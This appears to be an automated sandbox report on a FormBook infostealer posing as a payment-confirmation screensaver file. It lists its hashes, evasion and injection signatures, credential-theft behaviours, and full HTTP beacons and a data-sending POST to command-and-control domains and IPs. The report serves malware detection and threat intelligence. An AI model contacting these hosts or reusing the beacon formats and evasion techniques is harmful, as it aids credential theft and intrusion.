Windows Analysis Report
Payent confirmation copy 00888754087.scr

Overview

General Information

Sample name: Payent confirmation copy 00888754087.scr
Analysis ID: 1623505
MD5: 4b899b816220949de716a493b223786f
SHA1: 30ead58b9766de4d552bb448be978ac4ea3c9f3e
SHA256: 5a962362db0425ef6552d920519cacfae4fe3f86e8537fae95e44dcb6d1ad981

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches the installation path of Mozilla Firefox
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification


AV Detection

Source: http://www.quo1ybjmkhdqljoz.top/ynw5/?5Li4dVwP=ZF/ThatktxT4IEpzG7cEOEQKDl5qXd8mFNyY5ir4FklXSfOpwm6EZv8hiiYfkBo7BOp8Eo5LM5TpY/be/oKrhxeChN5TJBKneWdpD/fpNAQRh0k2tvtFoByt7+at&VtJ=JTIXk8dX64OXShTp Avira URL Cloud: Label: malware
Source: http://www.quo1ybjmkhdqljoz.top/ynw5/ Avira URL Cloud: Label: malware
Source: Payent confirmation copy 00888754087.scr Virustotal: Detection: 57%
Source: Payent confirmation copy 00888754087.scr ReversingLabs: Detection: 42%
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Payent confirmation copy 00888754087.scr Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Payent confirmation copy 00888754087.scr Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: EVew.pdb source: Payent confirmation copy 00888754087.scr
Source: Binary string: finger.pdb source: RegSvcs.exe, 00000003.00000002.388789742.0000000000834000.00000004.00000020.00020000.00000000.sdmp, HP9gbzNVWxqFR.exe, 00000005.00000002.866951455.0000000000414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: EVew.pdbSHA256 source: Payent confirmation copy 00888754087.scr
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000003.00000002.388824636.0000000000A20000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.389029493.0000000001F30000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.0000000002240000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000002.867123731.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000006.00000003.388630935.0000000001DD0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HP9gbzNVWxqFR.exe, 00000005.00000000.372400998.0000000000A6F000.00000002.00000001.01000000.00000009.sdmp, m0tdggs3TGEEG.exe, 00000007.00000000.401709637.000000000007F000.00000002.00000001.01000000.0000000A.sdmp

Networking

Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49165 -> 104.21.54.112:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49170 -> 43.251.56.78:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49169 -> 43.251.56.78:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49167 -> 43.251.56.78:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49182 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 209.74.77.230:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49178 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49181 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49173 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49168 -> 43.251.56.78:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49185 -> 209.74.77.230:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49191 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49192 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49196 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49195 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49205 -> 111.119.219.195:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49207 -> 104.21.11.99:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49219 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49197 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49202 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49210 -> 104.21.11.99:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49216 -> 8.222.228.107:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49188 -> 134.122.135.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49204 -> 111.119.219.195:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49211 -> 157.112.187.77:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49186 -> 209.74.77.230:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49220 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49190 -> 134.122.135.48:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49214 -> 157.112.187.77:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49208 -> 104.21.11.99:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49201 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 134.122.135.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49215 -> 8.222.228.107:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49206 -> 111.119.219.195:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49200 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49174 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49177 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49193 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49217 -> 8.222.228.107:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49213 -> 157.112.187.77:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 209.74.77.230:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49194 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49218 -> 8.222.228.107:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49199 -> 13.248.169.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49189 -> 134.122.135.48:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49212 -> 157.112.187.77:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49209 -> 104.21.11.99:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49198 -> 76.223.54.146:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49203 -> 111.119.219.195:80
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe DNS query: www.lenzor.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe DNS query: www.031233720.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe DNS query: www.dualbitcoin.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe DNS query: www.ethereumkeeper.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe DNS query: www.moonavatar.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe DNS query: www.blogkart4u.xyz
Source: C:\Program Files (x86)\GMyanhFhOLXBxrxbxQNReyaLzPaTGgepmjPqTnFxQ\m0tdggs3TGEEG.exe DNS query: www.splogi.xyz
Source: Joe Sandbox View IP Address: 45.33.6.223
Source: Joe Sandbox View IP Address: 13.248.169.48
Source: Joe Sandbox View ASN Name: SIPL-ASSysconInfowayPvtLtdIN
Source: C:\Windows\SysWOW64\finger.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3310000[1].zip
Source: global traffic HTTP traffic detected: GET /0pv3/?5Li4dVwP=I6G8DBRKF3PN9Cy6eSQwGAyDdGN/cDdG3kSPGuvbR5esC8dJu2Ef2kcQIbt6EaZSMDCxypqKCunYFMFRIQfdU/urNnrnWs/wzEHQWKTFseNumaFucpwU/BWqadt7&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.crosspatches.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /2020/sqlite-dll-win32-x86-3310000.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ynw5/?5Li4dVwP=ZF/ThatktxT4IEpzG7cEOEQKDl5qXd8mFNyY5ir4FklXSfOpwm6EZv8hiiYfkBo7BOp8Eo5LM5TpY/be/oKrhxeChN5TJBKneWdpD/fpNAQRh0k2tvtFoByt7+at&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /pknc/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=TsWT+PVJyweInpcuqcRAVrxMIv7dn7P2cuEH07dFoI07yBLnimF2FEtrpE3364l8p3e/PDZf3HpC8OkQkQ5LSQz9jdPhxX19W0a8kd2TAI93AlKVrgcReo5HaD+f HTTP/1.1Host: www.lenzor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /hxn2/?5Li4dVwP=ZV/imptMlgE5kVt5kHU0o4O4tcQA6xECFmm/TGgbqnHG1mgu4lPPPz/ean0zt7O89YX0LhkZHlQmk1AHou5QAwZMyaAlZWiHWzbiDEQq6v3xABUzIQjShnB7ifdL&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.warc.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /qxo2/?5Li4dVwP=o8DmqPI+VqVvnj/m3Ep5ZbXCdv7WCcZ2dVm8WOSQKn+kpW+rBJORlJQWjKKPmEYbP1qOyM3EY1vlLpLVfeIP+aH0F6NJfipveNVVPvCboJX2+lsywWfl6XS7rz+k&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.dualbitcoin.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /shtf/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=FhU37QPUjXoDR/mnXgxIEtz83r1ENt8m3Ft3Wddglnt/yj+Ebcteh0ZFDkUJwOmxlpknkAYCtP36SobD4aBfLUMWPCeFdyDrA6amDitayQW8jkDeTk1K57jxX06f HTTP/1.1Host: www.lifce.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /qkhv/?5Li4dVwP=i51Ixu4M5LOvjs5Z0ddqQXQ5E1Fi1x9FEg8Yva/DYuN1L4sxQPD0mZtOQeSo5cgGL7RFWiV8IGjONF0Yd4fmjQIy1qEAWTMe/urhveEh+mb/hG1w6E9a5F3JJ2qi&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.2y0uoqwoohvdf5vd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /gu37/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=iOl0XSH5CDMOf+V+eoOEKsCb+BMhqZbW7cxb7UU6mqRal+VgoP4cZ+zMwQ9+keLoshpFPIsDQUso6w5zMJEXg5krD1+3LX+lFO1BsIkui72/UxfJL4hroIKhe3Am HTTP/1.1Host: www.ethereumkeeper.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /r9i5/?5Li4dVwP=B8xCi7I3z1WfC3zy5Gez1uzC140fJkw4gGGGLN6Gdudf8KfCBsF2kFe1qI11OIwlnfJY2ngkWUsth2oSw9Rojf+LdLo2Dx9QyT9m9kTAG2XrNZHK+xybqiPO8qg1&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.moonavatar.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /36cg/?5Li4dVwP=c6lcAlso4cwdWdj/XXmo72tXy/48ylF94bq7w+xrmdROEAiOB56qVr/2YdYDhQjBey/p2vWRZnAQFn0r0aT/21GvLN/jduGbC7fAbrbkj9JRjpgLM/b72SNgEYCQ&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.blogkart4u.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /4w1v/?5Li4dVwP=XpAG9fe2pLhJKmhalIu92JQQ9It9VVb0J2u6NTgZVwSRoaiRiOX3MmQPhPLBrMCvNYN6hEdQPGTo1Qufxtt+tn9r4lhbcAvWgNxrAi+bBTu0kuuHxj4+mdjT2ge6&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.xiongding.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /hlq7/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=dKN4O6z/N4DapGrfV/C7O2nEVRSmVfPPG5RCVPQvSrMdLQWk1/Pc9yg0RaCqVVCHUclwHwIYbC5JrD9MUfc58FLQ+Gw/cASq5R5xuOTtHcpssNixd3vu4vq5AdU4 HTTP/1.1Host: www.savposalore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /ti21/?5Li4dVwP=WGxoXqct8zJEPhtsiQfMA1dM1LrnIiVaAgo9WLM116GuHzjz/IohkAfryFvNTok9C5aVkdBOP1BmlC339vhztHjO0CSpSPPM9QqrDBcyhH9jsCXUFnpxoEU8b3PA&VtJ=JTIXk8dX64OXShTp HTTP/1.1Host: www.splogi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: GET /pzq1/?VtJ=JTIXk8dX64OXShTp&5Li4dVwP=oDRqyMa6fuBuz7WlB5xgR/U2R+lw6PRTd5aLt2B5ybsFCSl98v1LfAHtcGvTaF2156e6g8X3X06m8zy7zKxgAqv3o+Bu1jvrOy7C8C4bdHaQ8UWAV+MpBEJPTvre HTTP/1.1Host: www.knowesis.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic DNS traffic detected: DNS query: www.crosspatches.info
Source: global traffic DNS traffic detected: DNS query: www.sqlite.org
Source: global traffic DNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
Source: global traffic DNS traffic detected: DNS query: www.lenzor.xyz
Source: global traffic DNS traffic detected: DNS query: www.warc.tech
Source: global traffic DNS traffic detected: DNS query: www.031233720.xyz
Source: global traffic DNS traffic detected: DNS query: www.dualbitcoin.xyz
Source: global traffic DNS traffic detected: DNS query: www.lifce.life
Source: global traffic DNS traffic detected: DNS query: www.2y0uoqwoohvdf5vd.top
Source: global traffic DNS traffic detected: DNS query: www.ethereumkeeper.xyz
Source: global traffic DNS traffic detected: DNS query: www.moonavatar.xyz
Source: global traffic DNS traffic detected: DNS query: www.blogkart4u.xyz
Source: global traffic DNS traffic detected: DNS query: www.xiongding.tech
Source: global traffic DNS traffic detected: DNS query: www.savposalore.shop
Source: global traffic DNS traffic detected: DNS query: www.splogi.xyz
Source: global traffic DNS traffic detected: DNS query: www.knowesis.app
Source: global traffic DNS traffic detected: DNS query: www.jingdongpt.shop
Source: unknown HTTP traffic detected: POST /ynw5/ HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.quo1ybjmkhdqljoz.topReferer: http://www.quo1ybjmkhdqljoz.top/ynw5/Connection: closeCache-Control: no-cacheContent-Length: 2165Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 09:08:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 09:08:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Feb 2025 09:08:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
